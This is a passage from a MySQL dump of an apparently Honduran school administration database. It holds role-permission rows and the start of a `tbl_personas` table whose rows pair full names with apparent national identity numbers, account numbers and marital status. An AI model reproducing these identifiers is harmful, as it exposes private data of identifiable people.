'RCORRALES', '2021-04-04 18:52:13'), (76, 53, 30, '0', '0', '0', '1', '2020-08-11 06:07:25', ' ADMIN ', NULL, NULL), (77, 54, 1, '1', '1', '0', '1', '2020-08-18 22:55:03', ' ADMIN ', NULL, NULL), (78, 54, 2, '1', '1', '0', '1', '2020-08-18 22:55:03', ' ADMIN ', NULL, NULL), (79, 54, 3, '1', '1', '0', '1', '2020-08-18 22:55:03', ' ADMIN ', NULL, NULL), (80, 54, 4, '1', '1', '0', '1', '2020-08-18 22:55:03', ' ADMIN ', NULL, NULL), (81, 54, 5, '1', '1', '0', '1', '2020-08-18 22:55:03', ' ADMIN ', NULL, NULL), (82, 54, 6, '1', '1', '0', '1', '2020-08-18 22:55:03', ' ADMIN ', NULL, NULL), (83, 54, 7, '1', '1', '0', '1', '2020-08-18 22:55:03', ' ADMIN ', NULL, NULL), (84, 54, 8, '1', '1', '0', '1', '2020-08-18 22:55:03', ' ADMIN ', NULL, NULL), (85, 54, 9, '1', '1', '0', '1', '2020-08-18 22:55:03', ' ADMIN ', NULL, NULL), (86, 54, 10, '1', '1', '0', '1', '2020-08-18 22:55:03', ' ADMIN ', NULL, NULL), (87, 54, 11, '1', '1', '0', '1', '2020-08-18 22:55:03', ' ADMIN ', NULL, NULL), (88, 54, 12, '1', '1', '0', '1', '2020-08-18 22:55:03', ' ADMIN ', NULL, NULL), (89, 54, 13, '1', '1', '0', '1', '2020-08-18 22:55:03', ' ADMIN ', NULL, NULL), (90, 54, 14, '1', '1', '0', '1', '2020-08-18 22:55:03', ' ADMIN ', NULL, NULL), (91, 54, 15, '1', '1', '0', '1', '2020-08-18 22:55:03', ' ADMIN ', NULL, NULL), (92, 54, 16, '1', '1', '0', '1', '2020-08-18 22:55:03', ' ADMIN ', NULL, NULL), (93, 54, 17, '1', '1', '0', '1', '2020-08-18 22:55:03', ' ADMIN ', NULL, NULL), (94, 54, 18, '1', '1', '0', '1', '2020-08-18 22:55:03', ' ADMIN ', NULL, NULL), (95, 54, 19, '1', '1', '0', '1', '2020-08-18 22:55:03', ' ADMIN ', NULL, NULL), (96, 54, 20, '1', '1', '0', '1', '2020-08-18 22:55:03', ' ADMIN ', NULL, NULL), (97, 54, 21, '1', '1', '0', '1', '2020-08-18 22:55:03', ' ADMIN ', NULL, NULL), (98, 54, 22, '1', '1', '0', '1', '2020-08-18 22:55:03', ' ADMIN ', NULL, NULL), (99, 54, 23, '1', '1', '0', '1', '2020-08-18 22:55:03', ' ADMIN ', NULL, NULL), (100, 54, 24, '1', '1', '0', '1', '2020-08-18 22:55:04', ' ADMIN ', NULL, NULL), (101, 54, 25, '1', '1', '0', '1', '2020-08-18 22:55:04', ' ADMIN ', NULL, NULL), (102, 54, 26, '1', '1', '0', '1', '2020-08-18 22:55:04', ' ADMIN ', NULL, NULL), (103, 54, 27, '1', '1', '0', '1', '2020-08-18 22:55:04', ' ADMIN ', NULL, NULL), (104, 54, 28, '1', '1', '0', '1', '2020-08-18 22:55:04', ' ADMIN ', NULL, NULL), (105, 54, 29, '1', '1', '0', '1', '2020-08-18 22:55:04', ' ADMIN ', NULL, NULL), (106, 54, 30, '1', '1', '0', '1', '2020-08-18 22:55:04', ' ADMIN ', NULL, NULL), (107, 54, 31, '1', '1', '0', '1', '2020-08-18 22:55:04', ' ADMIN ', NULL, NULL), (108, 54, 32, '1', '1', '0', '1', '2020-08-18 22:55:04', ' ADMIN ', NULL, NULL), (109, 54, 33, '1', '1', '0', '1', '2020-08-18 22:55:04', ' ADMIN ', NULL, NULL), (110, 54, 34, '1', '1', '0', '1', '2020-08-18 22:55:04', ' ADMIN ', NULL, NULL), (111, 54, 35, '1', '1', '0', '1', '2020-08-18 22:55:04', ' ADMIN ', NULL, NULL), (112, 54, 36, '1', '1', '0', '1', '2020-08-18 22:55:04', ' ADMIN ', NULL, NULL), (113, 54, 37, '1', '1', '0', '1', '2020-08-18 22:55:04', ' ADMIN ', NULL, NULL), (114, 54, 38, '1', '1', '0', '1', '2020-08-18 22:55:04', ' ADMIN ', NULL, NULL), (115, 55, 11, '1', '1', '0', '1', '2020-08-18 22:56:43', ' ADMIN ', NULL, NULL), (116, 55, 12, '1', '1', '0', '1', '2020-08-18 22:56:43', ' ADMIN ', NULL, NULL), (117, 55, 13, '0', '0', '0', '0', '2020-08-18 22:56:43', ' ADMIN ', 'ADMIN', '2021-03-19 15:53:34'), (118, 55, 14, '1', '1', '0', '1', '2020-08-18 22:56:43', ' ADMIN ', 'ADMIN', '2021-03-19 15:49:30'), (119, 55, 15, '1', '1', '0', '1', '2020-08-18 22:56:43', ' ADMIN ', NULL, NULL), (120, 55, 16, '1', '1', '0', '1', '2020-08-18 22:56:43', ' ADMIN ', NULL, NULL), (121, 55, 17, '0', '0', '0', '0', '2020-08-18 22:56:43', ' ADMIN ', 'ADMIN', '2021-03-19 15:54:29'), (122, 55, 18, '0', '0', '0', '0', '2020-08-18 22:56:43', ' ADMIN ', 'ADMIN', '2021-03-19 15:57:35'), (123, 55, 19, '0', '0', '0', '0', '2020-08-18 22:56:43', ' ADMIN ', 'ADMIN', '2021-03-19 15:56:58'), (124, 55, 20, '1', '1', '0', '1', '2020-08-18 22:56:43', ' ADMIN ', 'ADMIN', '2021-03-19 15:56:23'), (125, 55, 21, '1', '1', '0', '1', '2020-08-18 22:56:43', ' ADMIN ', NULL, NULL), (126, 55, 22, '1', '1', '0', '1', '2020-08-18 22:56:43', ' ADMIN ', NULL, NULL), (127, 55, 23, '1', '1', '0', '1', '2020-08-18 22:56:43', ' ADMIN ', NULL, NULL), (128, 55, 24, '1', '1', '0', '1', '2020-08-18 22:56:43', ' ADMIN ', NULL, NULL), (129, 55, 25, '1', '1', '0', '1', '2020-08-18 22:56:43', ' ADMIN ', NULL, NULL), (130, 55, 26, '1', '1', '0', '1', '2020-08-18 22:56:43', ' ADMIN ', NULL, NULL), (131, 55, 27, '1', '1', '0', '1', '2020-08-18 22:56:43', ' ADMIN ', NULL, NULL), (132, 55, 28, '1', '1', '0', '1', '2020-08-18 22:56:43', ' ADMIN ', NULL, NULL), (133, 56, 11, '1', '1', '0', '1', '2020-08-18 22:57:37', ' ADMIN ', NULL, NULL), (134, 56, 12, '1', '1', '0', '1', '2020-08-18 22:57:37', ' ADMIN ', NULL, NULL), (135, 56, 29, '1', '1', '0', '1', '2020-08-18 22:57:37', ' ADMIN ', NULL, NULL), (136, 56, 30, '1', '1', '0', '1', '2020-08-18 22:57:37', ' ADMIN ', NULL, NULL), (137, 56, 31, '1', '1', '0', '1', '2020-08-18 22:57:37', ' ADMIN ', NULL, NULL), (138, 56, 32, '1', '1', '0', '1', '2020-08-18 22:57:37', ' ADMIN ', NULL, NULL), (139, 56, 33, '1', '1', '0', '1', '2020-08-18 22:57:37', ' ADMIN ', NULL, NULL), (140, 56, 34, '1', '1', '0', '1', '2020-08-18 22:57:37', ' ADMIN ', NULL, NULL), (141, 56, 35, '1', '1', '0', '1', '2020-08-18 22:57:37', ' ADMIN ', NULL, NULL), (142, 56, 36, '1', '1', '0', '1', '2020-08-18 22:57:37', ' ADMIN ', NULL, NULL), (143, 56, 37, '1', '1', '0', '1', '2020-08-18 22:57:37', ' ADMIN ', NULL, NULL), (144, 56, 38, '1', '1', '0', '1', '2020-08-18 22:57:37', ' ADMIN ', NULL, NULL), (145, 57, 1, '1', '1', '0', '1', '2020-08-18 22:58:42', ' ADMIN ', NULL, NULL), (146, 57, 2, '1', '1', '0', '1', '2020-08-18 22:58:42', ' ADMIN ', NULL, NULL), (147, 57, 3, '1', '1', '0', '1', '2020-08-18 22:58:42', ' ADMIN ', NULL, NULL), (148, 57, 4, '1', '1', '0', '1', '2020-08-18 22:58:42', ' ADMIN ', NULL, NULL), (149, 57, 5, '1', '1', '0', '1', '2020-08-18 22:58:42', ' ADMIN ', NULL, NULL), (150, 57, 6, '1', '1', '0', '1', '2020-08-18 22:58:42', ' ADMIN ', NULL, NULL), (151, 57, 7, '1', '1', '0', '1', '2020-08-18 22:58:42', ' ADMIN ', NULL, NULL), (152, 57, 8, '1', '1', '0', '1', '2020-08-18 22:58:42', ' ADMIN ', NULL, NULL), (153, 57, 9, '1', '1', '0', '1', '2020-08-18 22:58:42', ' ADMIN ', NULL, NULL), (154, 57, 10, '1', '1', '0', '1', '2020-08-18 22:58:42', ' ADMIN ', NULL, NULL), (155, 57, 11, '1', '1', '0', '1', '2020-08-18 22:58:42', ' ADMIN ', NULL, NULL), (156, 57, 12, '1', '1', '0', '1', '2020-08-18 22:58:42', ' ADMIN ', NULL, NULL), (157, 57, 13, '1', '1', '0', '1', '2020-08-18 22:58:42', ' ADMIN ', NULL, NULL), (158, 57, 14, '1', '1', '0', '1', '2020-08-18 22:58:42', ' ADMIN ', NULL, NULL), (159, 57, 15, '1', '1', '0', '1', '2020-08-18 22:58:42', ' ADMIN ', NULL, NULL), (160, 57, 16, '1', '1', '0', '1', '2020-08-18 22:58:42', ' ADMIN ', NULL, NULL), (161, 57, 17, '1', '1', '0', '1', '2020-08-18 22:58:42', ' ADMIN ', NULL, NULL), (162, 57, 18, '1', '1', '0', '1', '2020-08-18 22:58:42', ' ADMIN ', NULL, NULL), (163, 57, 19, '1', '1', '0', '1', '2020-08-18 22:58:42', ' ADMIN ', NULL, NULL), (164, 57, 20, '1', '1', '0', '1', '2020-08-18 22:58:42', ' ADMIN ', NULL, NULL), (165, 57, 21, '1', '1', '0', '1', '2020-08-18 22:58:42', ' ADMIN ', NULL, NULL), (166, 57, 22, '1', '1', '0', '1', '2020-08-18 22:58:42', ' ADMIN ', NULL, NULL), (167, 57, 23, '1', '1', '0', '1', '2020-08-18 22:58:42', ' ADMIN ', NULL, NULL), (168, 57, 24, '1', '1', '0', '1', '2020-08-18 22:58:42', ' ADMIN ', NULL, NULL), (169, 57, 25, '1', '1', '0', '1', '2020-08-18 22:58:42', ' ADMIN ', NULL, NULL), (170, 57, 26, '1', '1', '0', '1', '2020-08-18 22:58:42', ' ADMIN ', NULL, NULL), (171, 57, 27, '1', '1', '0', '1', '2020-08-18 22:58:42', ' ADMIN ', NULL, NULL), (172, 57, 28, '1', '1', '0', '1', '2020-08-18 22:58:42', ' ADMIN ', NULL, NULL), (173, 57, 29, '1', '1', '0', '1', '2020-08-18 22:58:42', ' ADMIN ', NULL, NULL), (174, 57, 30, '1', '1', '0', '1', '2020-08-18 22:58:42', ' ADMIN ', NULL, NULL), (175, 57, 31, '1', '1', '0', '1', '2020-08-18 22:58:42', ' ADMIN ', NULL, NULL), (176, 57, 32, '1', '1', '0', '1', '2020-08-18 22:58:43', ' ADMIN ', NULL, NULL), (177, 57, 33, '1', '1', '0', '1', '2020-08-18 22:58:43', ' ADMIN ', NULL, NULL), (178, 57, 34, '1', '1', '0', '1', '2020-08-18 22:58:43', ' ADMIN ', NULL, NULL), (179, 57, 35, '1', '1', '0', '1', '2020-08-18 22:58:43', ' ADMIN ', NULL, NULL), (180, 57, 36, '1', '1', '0', '1', '2020-08-18 22:58:43', ' ADMIN ', NULL, NULL), (181, 57, 37, '1', '1', '0', '1', '2020-08-18 22:58:43', ' ADMIN ', NULL, NULL), (182, 57, 38, '1', '1', '0', '1', '2020-08-18 22:58:43', ' ADMIN ', NULL, NULL), (183, 46, 39, '1', '1', '1', '1', '2020-08-29 02:49:22', ' ADMIN ', NULL, NULL), (184, 46, 40, '1', '1', '1', '1', '2020-08-29 02:49:22', ' ADMIN ', NULL, NULL), (185, 46, 41, '1', '1', '1', '1', '2020-08-31 20:18:46', ' ADMIN ', NULL, NULL), (186, 46, 42, '1', '1', '1', '1', '2020-08-31 20:18:46', ' ADMIN ', NULL, NULL), (187, 46, 43, '1', '1', '1', '1', '2020-10-19 19:15:21', ' ADMIN ', NULL, NULL), (188, 46, 44, '1', '1', '1', '1', '2020-10-19 19:15:25', ' ADMIN ', NULL, NULL), (189, 49, 43, '1', '0', '0', '1', '2020-10-22 19:57:13', ' ADMIN ', NULL, NULL), (190, 49, 39, '1', '0', '0', '1', '2020-10-27 21:53:44', ' ADMIN ', NULL, NULL), (191, 49, 40, '1', '0', '0', '1', '2020-10-27 21:53:47', ' ADMIN ', NULL, NULL), (192, 49, 41, '1', '0', '0', '1', '2020-10-27 21:53:50', ' ADMIN ', NULL, NULL), (193, 49, 42, '1', '0', '0', '1', '2020-10-27 21:53:53', ' ADMIN ', NULL, NULL), (194, 49, 15, '1', '0', '0', '1', '2020-10-27 22:04:07', ' ADMIN ', NULL, NULL), (195, 49, 16, '1', '0', '0', '1', '2020-10-27 22:04:10', ' ADMIN ', NULL, NULL), (196, 46, 45, '1', '1', '1', '1', '2020-11-02 16:34:35', ' ADMIN ', NULL, NULL), (197, 46, 46, '1', '1', '1', '1', '2020-11-02 16:34:38', ' ADMIN ', NULL, NULL), (198, 46, 47, '1', '1', '1', '1', '2020-11-02 16:34:42', ' ADMIN ', NULL, NULL), (199, 46, 48, '1', '1', '1', '1', '2020-11-02 16:34:45', ' ADMIN ', NULL, NULL), (200, 46, 49, '1', '1', '1', '1', '2020-11-02 19:42:23', ' ADMIN ', NULL, NULL), (201, 46, 50, '1', '1', '1', '1', '2020-11-02 19:42:25', ' ADMIN ', 'ADMIN', '2020-11-03 19:47:05'), (202, 46, 51, '1', '1', '1', '1', '2020-11-02 19:42:26', ' ADMIN ', NULL, NULL), (203, 46, 52, '1', '1', '1', '1', '2020-11-02 19:42:28', ' ADMIN ', NULL, NULL), (204, 46, 53, '1', '1', '1', '1', '2020-11-02 19:42:29', ' ADMIN ', NULL, NULL), (205, 46, 54, '1', '1', '1', '1', '2020-11-02 19:42:31', ' ADMIN ', NULL, NULL), (206, 46, 55, '1', '1', '1', '1', '2020-11-28 20:11:55', ' ADMIN ', NULL, NULL), (207, 46, 56, '1', '1', '1', '1', '2020-12-02 00:51:57', ' ADMIN ', NULL, NULL), (208, 46, 57, '1', '1', '1', '1', '2020-12-02 20:47:09', ' ADMIN ', NULL, NULL), (209, 46, 58, '1', '1', '1', '1', '2020-12-02 22:27:11', ' ADMIN ', NULL, NULL), (210, 46, 59, '1', '1', '1', '1', '2020-12-02 22:54:55', ' ADMIN ', NULL, NULL), (211, 46, 60, '1', '1', '1', '1', '2020-12-02 23:25:41', ' ADMIN ', NULL, NULL), (212, 46, 61, '1', '1', '1', '1', '2020-12-03 00:24:52', ' ADMIN ', NULL, NULL), (213, 46, 62, '1', '1', '1', '1', '2020-12-04 22:00:52', ' ADMIN ', NULL, NULL), (214, 46, 63, '1', '1', '1', '1', '2020-12-05 23:45:34', ' ADMIN ', NULL, NULL), (215, 46, 64, '1', '1', '1', '1', '2020-12-05 23:45:35', ' ADMIN ', NULL, NULL), (216, 46, 65, '1', '1', '1', '1', '2020-12-05 23:45:37', ' ADMIN ', NULL, NULL), (217, 46, 66, '1', '1', '1', '1', '2020-12-05 23:45:38', ' ADMIN ', NULL, NULL), (218, 46, 67, '1', '1', '1', '1', '2020-12-05 23:45:39', ' ADMIN ', NULL, NULL), (219, 46, 68, '1', '1', '1', '1', '2020-12-05 23:45:41', ' ADMIN ', NULL, NULL), (220, 63, 41, '1', '1', '0', '0', '2021-02-11 17:37:47', ' ADMIN ', 'ADMIN', '2021-02-11 17:38:54'), (221, 49, 18, '1', '0', '0', '1', '2021-03-05 23:07:01', ' ADMIN ', NULL, NULL), (222, 46, 69, '1', '1', '1', '1', '2021-03-10 22:49:46', ' ADMIN ', NULL, NULL), (223, 46, 70, '1', '1', '1', '1', '2021-03-11 04:59:42', ' ADMIN ', NULL, NULL), (224, 46, 72, '1', '1', '1', '1', '2021-03-17 05:58:17', ' ADMIN ', NULL, NULL), (225, 46, 76, '1', '1', '1', '1', '2021-03-17 18:14:10', ' ADMIN ', NULL, NULL), (226, 46, 77, '1', '1', '1', '1', '2021-03-17 18:14:12', ' ADMIN ', NULL, NULL), (227, 46, 78, '1', '1', '1', '1', '2021-03-17 22:51:32', ' ADMIN ', NULL, NULL), (228, 46, 79, '1', '1', '1', '1', '2021-03-17 22:51:33', ' ADMIN ', NULL, NULL), (229, 46, 87, '1', '1', '1', '1', '2021-03-18 22:47:32', ' ADMIN ', NULL, NULL), (230, 46, 88, '1', '1', '1', '1', '2021-03-19 01:45:33', ' ADMIN ', NULL, NULL), (231, 46, 89, '1', '1', '1', '1', '2021-03-19 01:45:35', ' ADMIN ', NULL, NULL), (232, 46, 73, '1', '1', '1', '1', '2021-03-19 03:29:43', ' ADMIN ', NULL, NULL), (233, 46, 74, '1', '1', '1', '1', '2021-03-19 03:29:45', ' ADMIN ', NULL, NULL), (234, 46, 75, '1', '1', '1', '1', '2021-03-19 03:29:47', ' ADMIN ', NULL, NULL), (235, 46, 80, '1', '1', '1', '1', '2021-03-19 03:29:49', ' ADMIN ', NULL, NULL), (236, 46, 81, '1', '1', '1', '1', '2021-03-19 03:29:50', ' ADMIN ', NULL, NULL), (237, 46, 82, '1', '1', '1', '1', '2021-03-19 03:29:51', ' ADMIN ', NULL, NULL), (238, 46, 83, '1', '1', '1', '1', '2021-03-19 03:29:53', ' ADMIN ', NULL, NULL), (239, 46, 84, '1', '1', '1', '1', '2021-03-19 03:29:54', ' ADMIN ', NULL, NULL), (240, 46, 85, '1', '1', '1', '1', '2021-03-19 03:29:57', ' ADMIN ', NULL, NULL), (241, 46, 86, '1', '1', '1', '1', '2021-03-19 03:29:58', ' ADMIN ', NULL, NULL), (242, 46, 90, '1', '1', '1', '1', '2021-03-19 03:30:02', ' ADMIN ', NULL, NULL), (243, 46, 91, '1', '1', '1', '1', '2021-03-19 03:30:04', ' ADMIN ', NULL, NULL), (244, 64, 49, '1', '1', '1', '1', '2021-03-23 00:10:57', ' ADMIN ', NULL, NULL), (245, 64, 50, '0', '0', '0', '0', '2021-03-23 00:10:58', ' ADMIN ', 'ADMIN', '2021-04-08 22:07:18'), (246, 64, 51, '0', '0', '0', '0', '2021-03-23 00:11:00', ' ADMIN ', 'ADMIN', '2021-04-08 22:03:23'), (247, 64, 54, '1', '1', '1', '1', '2021-03-23 00:11:01', ' ADMIN ', NULL, NULL), (248, 65, 24, '1', '0', '0', '1', '2021-04-04 18:53:18', ' RCORRALES ', NULL, NULL), (249, 65, 51, '0', '1', '0', '0', '2021-04-04 18:57:41', ' RCORRALES ', NULL, NULL), (250, 46, 92, '1', '1', '1', '1', NULL, NULL, NULL, NULL), (251, 54, 92, '1', '1', '1', '1', NULL, NULL, NULL, NULL), (252, 55, 92, '1', '1', '1', '1', NULL, NULL, NULL, NULL), (253, 64, 53, '1', '1', '1', '1', '2021-04-08 22:05:20', ' ADMIN ', NULL, NULL), (254, 46, 93, '1', '1', '1', '1', '2021-04-11 05:32:53', ' ADMIN ', NULL, NULL), (255, 46, 94, '1', '1', '1', '1', '2021-04-21 08:06:55', ' ADMIN ', NULL, NULL), (256, 68, 1, '1', '0', '1', '1', '2021-04-23 01:58:16', ' ADMIN ', 'ADMIN', '2021-04-23 02:03:55'), (257, 68, 3, '1', '1', '0', '1', '2021-04-23 01:58:17', ' ADMIN ', NULL, NULL), (258, 56, 45, '1', '1', '1', '1', '2021-04-30 19:18:28', ' ADMIN ', NULL, NULL), (259, 56, 47, '1', '1', '1', '1', '2021-04-30 19:18:29', ' ADMIN ', NULL, NULL), (260, 56, 48, '1', '1', '1', '1', '2021-04-30 19:18:30', ' ADMIN ', NULL, NULL), (261, 56, 49, '1', '1', '1', '1', '2021-04-30 19:18:32', ' ADMIN ', NULL, NULL), (262, 56, 51, '1', '1', '1', '1', '2021-04-30 19:18:34', ' ADMIN ', NULL, NULL), (263, 56, 55, '1', '1', '1', '1', '2021-04-30 19:18:35', ' ADMIN ', NULL, NULL), (264, 56, 56, '1', '1', '1', '1', '2021-04-30 19:18:37', ' ADMIN ', NULL, NULL), (265, 56, 57, '1', '1', '1', '1', '2021-04-30 19:18:38', ' ADMIN ', NULL, NULL), (266, 56, 58, '1', '1', '1', '1', '2021-04-30 19:18:40', ' ADMIN ', NULL, NULL), (267, 56, 59, '1', '1', '1', '1', '2021-04-30 19:18:42', ' ADMIN ', NULL, NULL), (268, 56, 60, '1', '1', '1', '1', '2021-04-30 19:18:43', ' ADMIN ', NULL, NULL), (269, 56, 61, '1', '1', '1', '1', '2021-04-30 19:18:45', ' ADMIN ', NULL, NULL), (270, 56, 62, '1', '1', '1', '1', '2021-04-30 19:18:47', ' ADMIN ', NULL, NULL), (271, 56, 63, '1', '1', '1', '1', '2021-04-30 19:18:49', ' ADMIN ', NULL, NULL), (272, 56, 64, '1', '1', '1', '1', '2021-04-30 19:18:51', ' ADMIN ', NULL, NULL), (273, 56, 65, '1', '1', '1', '1', '2021-04-30 19:18:52', ' ADMIN ', NULL, NULL), (274, 56, 66, '1', '1', '1', '1', '2021-04-30 19:18:53', ' ADMIN ', NULL, NULL), (275, 56, 67, '1', '1', '1', '1', '2021-04-30 19:18:55', ' ADMIN ', NULL, NULL), (276, 56, 68, '1', '1', '1', '1', '2021-04-30 19:18:57', ' ADMIN ', NULL, NULL), (277, 56, 69, '1', '1', '1', '1', '2021-04-30 19:18:59', ' ADMIN ', NULL, NULL), (278, 56, 70, '1', '1', '1', '1', '2021-04-30 19:19:00', ' ADMIN ', NULL, NULL), (279, 56, 71, '1', '1', '1', '1', '2021-04-30 19:19:02', ' ADMIN ', NULL, NULL), (280, 56, 73, '1', '1', '1', '1', '2021-04-30 19:19:04', ' ADMIN ', NULL, NULL), (281, 56, 74, '1', '1', '1', '1', '2021-04-30 19:19:06', ' ADMIN ', NULL, NULL), (282, 56, 75, '1', '1', '1', '1', '2021-04-30 19:19:07', ' ADMIN ', NULL, NULL), (283, 56, 76, '1', '1', '1', '1', '2021-04-30 19:19:09', ' ADMIN ', NULL, NULL), (284, 56, 77, '1', '1', '1', '1', '2021-04-30 19:19:10', ' ADMIN ', NULL, NULL), (285, 56, 78, '1', '1', '1', '1', '2021-04-30 19:19:13', ' ADMIN ', NULL, NULL), (286, 56, 79, '1', '1', '1', '1', '2021-04-30 19:19:15', ' ADMIN ', NULL, NULL), (287, 56, 80, '1', '1', '1', '1', '2021-04-30 19:19:16', ' ADMIN ', NULL, NULL), (288, 56, 81, '1', '1', '1', '1', '2021-04-30 19:19:18', ' ADMIN ', NULL, NULL), (289, 56, 82, '1', '1', '1', '1', '2021-04-30 19:19:21', ' ADMIN ', NULL, NULL), (290, 56, 83, '1', '1', '1', '1', '2021-04-30 19:19:23', ' ADMIN ', NULL, NULL), (291, 56, 84, '1', '1', '1', '1', '2021-04-30 19:19:25', ' ADMIN ', NULL, NULL), (292, 56, 85, '1', '1', '1', '1', '2021-04-30 19:19:26', ' ADMIN ', NULL, NULL), (293, 56, 86, '1', '1', '1', '1', '2021-04-30 19:19:29', ' ADMIN ', NULL, NULL), (294, 56, 88, '1', '1', '1', '1', '2021-04-30 19:19:30', ' ADMIN ', NULL, NULL), (295, 56, 89, '1', '1', '1', '1', '2021-04-30 19:19:32', ' ADMIN ', NULL, NULL), (296, 56, 90, '1', '1', '1', '1', '2021-04-30 19:19:33', ' ADMIN ', NULL, NULL), (297, 56, 91, '1', '1', '1', '1', '2021-04-30 19:19:35', ' ADMIN ', NULL, NULL), (298, 56, 92, '1', '1', '1', '1', '2021-04-30 19:19:37', ' ADMIN ', NULL, NULL), (299, 56, 93, '1', '1', '1', '1', '2021-04-30 19:19:39', ' ADMIN ', NULL, NULL), (300, 56, 94, '1', '1', '1', '1', '2021-04-30 19:19:40', ' ADMIN ', NULL, NULL), (301, 46, 95, '1', '1', '1', '1', '2021-05-28 23:32:08', ' ADMIN ', NULL, NULL), (302, 46, 99, '1', '1', '1', '1', '2021-05-28 23:32:35', ' ADMIN ', NULL, NULL), (303, 46, 100, '1', '1', '1', '1', '2021-05-28 23:32:49', ' ADMIN ', NULL, NULL), (304, 46, 101, '1', '1', '1', '1', '2021-05-28 23:33:03', ' ADMIN ', NULL, NULL), (305, 46, 102, '1', '1', '1', '1', '2021-05-28 23:33:10', ' ADMIN ', NULL, NULL), (306, 46, 96, '1', '1', '1', '1', '2021-05-28 23:48:39', ' ADMIN ', NULL, NULL), (307, 46, 97, '1', '1', '1', '1', '2021-05-28 23:48:40', ' ADMIN ', NULL, NULL), (308, 46, 98, '1', '1', '1', '1', '2021-05-28 23:48:44', ' ADMIN ', NULL, NULL), (309, 46, 103, '1', '1', '1', '1', '2021-05-28 23:48:50', ' ADMIN ', NULL, NULL), (310, 46, 104, '1', '1', '1', '1', '2021-06-04 20:47:53', ' ADMIN ', NULL, NULL), (311, 46, 105, '1', '1', '1', '1', '2021-06-04 20:47:56', ' ADMIN ', NULL, NULL), (312, 46, 106, '1', '1', '1', '1', '2021-06-04 21:16:41', ' ADMIN ', NULL, NULL), (313, 46, 107, '1', '1', '1', '1', '2021-06-04 21:16:46', ' ADMIN ', NULL, NULL), (314, 46, 109, '1', '1', '1', '1', '2021-06-04 21:54:35', ' ADMIN ', NULL, NULL), (315, 46, 110, '1', '1', '1', '1', '2021-06-04 21:54:44', ' ADMIN ', NULL, NULL), (316, 46, 111, '1', '1', '1', '1', '2021-06-04 22:32:27', ' ADMIN ', NULL, NULL), (317, 46, 112, '1', '1', '1', '1', '2021-06-04 22:32:28', ' ADMIN ', NULL, NULL), (318, 46, 113, '1', '1', '1', '1', '2021-06-04 22:32:29', ' ADMIN ', NULL, NULL), (319, 46, 114, '1', '1', '1', '1', '2021-06-04 23:33:33', ' ADMIN ', NULL, NULL), (320, 46, 115, '1', '1', '1', '1', '2021-06-04 23:33:41', ' ADMIN ', NULL, NULL), (321, 46, 116, '1', '1', '1', '1', '2021-06-04 23:33:45', ' ADMIN ', NULL, NULL), (330, 46, 160, '1', '1', '1', '1', '2021-08-18 23:59:50', 'admin', 'admin', '2021-08-18 23:59:50'), (331, 46, 161, '1', '1', '1', '1', '2021-08-18 23:59:50', 'admin', 'admin', '2021-08-18 23:59:50'), (332, 46, 162, '1', '1', '1', '1', '2021-08-18 23:59:50', 'admin', 'admin', '2021-08-18 23:59:50'), (333, 46, 163, '1', '1', '1', '1', '2021-08-18 23:59:50', 'admin', 'admin', '2021-08-18 23:59:50'), (334, 46, 164, '1', '1', '1', '1', '2021-08-18 23:59:50', 'admin', 'admin', '2021-08-18 23:59:50'), (335, 46, 165, '1', '1', '1', '1', '2021-08-18 23:59:50', 'admin', 'admin', '2021-08-18 23:59:50'), (336, 46, 166, '1', '1', '1', '1', '2021-08-18 23:59:50', 'admin', 'admin', '2021-08-18 23:59:50'), (337, 46, 167, '1', '1', '1', '1', '2021-08-18 23:59:50', 'admin', 'admin', '2021-08-18 23:59:50'), (338, 46, 168, '1', '1', '1', '1', '2021-08-18 23:59:50', 'admin', 'admin', '2021-08-18 23:59:50'), (339, 46, 169, '1', '1', '1', '1', '2021-08-18 23:59:50', 'admin', 'admin', '2021-08-18 23:59:50'), (340, 46, 170, '1', '1', '1', '1', '2021-08-18 23:59:50', 'admin', 'admin', '2021-08-18 23:59:50'), (341, 46, 171, '1', '1', '1', '1', '2021-08-18 23:59:50', 'admin', 'admin', '2021-08-18 23:59:50'), (342, 46, 172, '1', '1', '1', '1', '2021-08-18 23:59:50', 'admin', 'admin', '2021-08-18 23:59:50'), (343, 46, 173, '1', '1', '1', '1', '2021-08-18 23:59:50', 'admin', 'admin', '2021-08-18 23:59:50'), (344, 46, 174, '1', '1', '1', '1', '2021-08-18 23:59:50', 'admin', 'admin', '2021-08-18 23:59:50'), (345, 46, 175, '1', '1', '1', '1', '2021-08-18 23:59:50', 'admin', 'admin', '2021-08-18 23:59:50'), (346, 46, 176, '1', '1', '1', '1', '2021-08-18 23:59:50', 'admin', 'admin', '2021-08-18 23:59:50'), (347, 46, 177, '1', '1', '1', '1', '2021-08-18 23:59:50', 'admin', 'admin', '2021-08-18 23:59:50'), (348, 46, 178, '1', '1', '1', '1', '2021-08-18 23:59:50', 'admin', 'admin', '2021-08-18 23:59:50'), (349, 46, 179, '1', '1', '1', '1', '2021-08-18 23:59:51', 'admin', 'admin', '2021-08-18 23:59:51'), (350, 46, 180, '1', '1', '1', '1', '2021-08-18 23:59:52', 'admin', 'admin', '2021-08-18 23:59:52'), (351, 46, 181, '1', '1', '1', '1', '2021-08-18 23:59:53', 'admin', 'admin', '2021-08-18 23:59:53'); -- -------------------------------------------------------- -- -- Estructura de tabla para la tabla `tbl_personas` -- CREATE TABLE `tbl_personas` ( `id_persona` bigint(20) NOT NULL, `nombres` varchar(255) NOT NULL, `apellidos` varchar(255) DEFAULT NULL, `sexo` varchar(255) NOT NULL, `identidad` varchar(255) DEFAULT NULL, `nacionalidad` varchar(50) DEFAULT NULL, `estado_civil` varchar(25) DEFAULT NULL, `fecha_nacimiento` date DEFAULT NULL, `id_tipo_persona` int(11) DEFAULT NULL, `Estado` varchar(50) DEFAULT NULL, `id_tipo_docente` int(11) DEFAULT NULL ) ENGINE=InnoDB DEFAULT CHARSET=utf8mb4; -- -- Volcado de datos para la tabla `tbl_personas` -- INSERT INTO `tbl_personas` (`id_persona`, `nombres`, `apellidos`, `sexo`, `identidad`, `nacionalidad`, `estado_civil`, `fecha_nacimiento`, `id_tipo_persona`, `Estado`, `id_tipo_docente`) VALUES (3, 'Daniel ', '20161002890', 'numero de cuenta', 'Alumno', NULL, NULL, NULL, 2, 'INACTIVO', 1), (4, 'Helmer Ernesto ', 'Calix', 'numero de cuenta', 'Alumno', NULL, NULL, NULL, 2, 'INACTIVO', NULL), (6, 'CHRISTEL NICOLE ', 'NEUMANN CALLEJAS', 'NUMERO_CUENTA', '0801-1996-15579', NULL, NULL, '2020-10-20', 2, 'INACTIVO', NULL), (10, 'FANY', 'BARAHONA', 'FEMENINO', '0801-1997-23034', 'HODURENA', 'CASADO', '2020-01-02', 1, 